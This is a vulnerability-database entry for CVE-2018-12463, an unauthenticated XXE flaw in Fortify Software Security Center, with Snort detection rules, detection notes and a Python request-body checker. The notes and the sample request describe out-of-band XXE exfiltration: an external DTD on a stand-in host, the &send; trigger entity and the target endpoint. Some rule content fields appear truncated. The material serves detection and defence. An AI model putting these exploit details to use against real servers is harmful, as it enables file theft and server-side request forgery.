CVE-2018-12463
published 2018-07-12

Priority: P2 (69) · critical
CVSS 3.1: 9.8 · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 13.85% (96.1th percentile)
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.

Affected (4 ranges)

Vendor | Product | Version range | Fixed in
hp | fortify_software_security_center | |
hp | fortify_software_security_center | |
hp | fortify_software_security_center | |
micro_focus | fortify_software_security_center | |

Detection & IOCs (extracted from sources)

path: /ssc/fm-ws/services
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:""; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025841; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025842; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*ftp\x3a\x2f\x2f/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025843; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; content:"&send|3b|"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025844; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
  • Target the unauthenticated SOAP endpoint POST /ssc/fm-ws/services — no credentials are required to exploit this XXE vulnerability.
  • Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over HTTP (SYSTEM "http://...*.dtd") — indicative of OOB-XXE exfiltration attempts.
  • Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over FTP (SYSTEM "ftp://...") — indicative of FTP-based OOB-XXE exfiltration.
  • Look for the XML entity reference &send; in POST bodies to /fm-ws/services, which is the OOB-XXE trigger entity used to exfiltrate data to an attacker-controlled server.
  • The exploit sets Content-Type to 'text/xml; charset=UTF-8; text/html;' and SOAPAction: "" — anomalous Content-Type concatenation can be used as an additional detection signal.
  • The vulnerability affects only specific versions of Fortify SSC; confirm the deployed version before applying detections to avoid false positives on patched instances.
  • The Snort/ET rules use PCRE on the HTTP request body; ensure your IDS/IPS is configured to inspect full request bodies (not just headers) for the /fm-ws/services URI path.
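The detection signals listed above, turned into a small request-body check, as an added example that is not part of this page's data or of the ET rules: the URI path, the external-DTD patterns over HTTP and FTP, the &send; trigger entity and the concatenated Content-Type come from the notes above; xxe_signals and the sample requests are constructed for illustration.

```python
import re

# Path and patterns from the detection notes on this page; the function name
# and the sample requests below are hypothetical, added for illustration.
TARGET_PATH = "/fm-ws/services"
EXTERNAL_DTD_RE = re.compile(
    r'<!(?:DOCTYPE|ENTITY)[^>]*SYSTEM\s*"\s*(?P<url>(?P<scheme>https?|ftp)://[^"]*)',
    re.IGNORECASE | re.DOTALL,
)
OOB_TRIGGER_RE = re.compile(r"&send;")


def xxe_signals(method, path, headers, body):
    """Return the sorted list of detection signals that fire for one request."""
    if method.upper() != "POST" or not path.endswith(TARGET_PATH):
        return []  # only POSTs to the SOAP endpoint named on the page are in scope
    signals = set()
    for m in EXTERNAL_DTD_RE.finditer(body):
        scheme, url = m.group("scheme").lower(), m.group("url").lower()
        if scheme.startswith("http") and url.endswith(".dtd"):
            signals.add("external-dtd-http")   # external DTD fetched over HTTP
        elif scheme == "ftp":
            signals.add("external-dtd-ftp")    # external DTD fetched over FTP
    if OOB_TRIGGER_RE.search(body):
        signals.add("oob-trigger-entity")      # &send; exfiltration trigger
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    if "text/xml" in ctype and "text/html" in ctype:
        signals.add("anomalous-content-type")  # concatenated Content-Type value
    return sorted(signals)


# Constructed sample requests (not captured traffic).
BENIGN_BODY = (
    '<?xml version="1.0"?><soapenv:Envelope '
    'xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Body/></soapenv:Envelope>"
)
SUSPICIOUS_HEADERS = {"Content-Type": "text/xml; charset=UTF-8; text/html;", "SOAPAction": '""'}
SUSPICIOUS_BODY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE data SYSTEM "http://collector.example.invalid/x.dtd">'
    "<data>&send;</data>"
)
FTP_BODY = '<?xml version="1.0"?><!DOCTYPE data SYSTEM "ftp://collector.example.invalid/"><data/>'

if __name__ == "__main__":
    print(xxe_signals("POST", "/ssc/fm-ws/services", SUSPICIOUS_HEADERS, SUSPICIOUS_BODY))
    print(xxe_signals("POST", "/ssc/fm-ws/services", {"Content-Type": "text/xml"}, BENIGN_BODY))
```

Run it over request logs that include the full body; a request that fires two or more signals is worth pulling for review even where the version check in the note above has not yet been done.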

CVSS provenance

NVD · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD · v3.0 · 7.3 HIGH · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
NVD · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P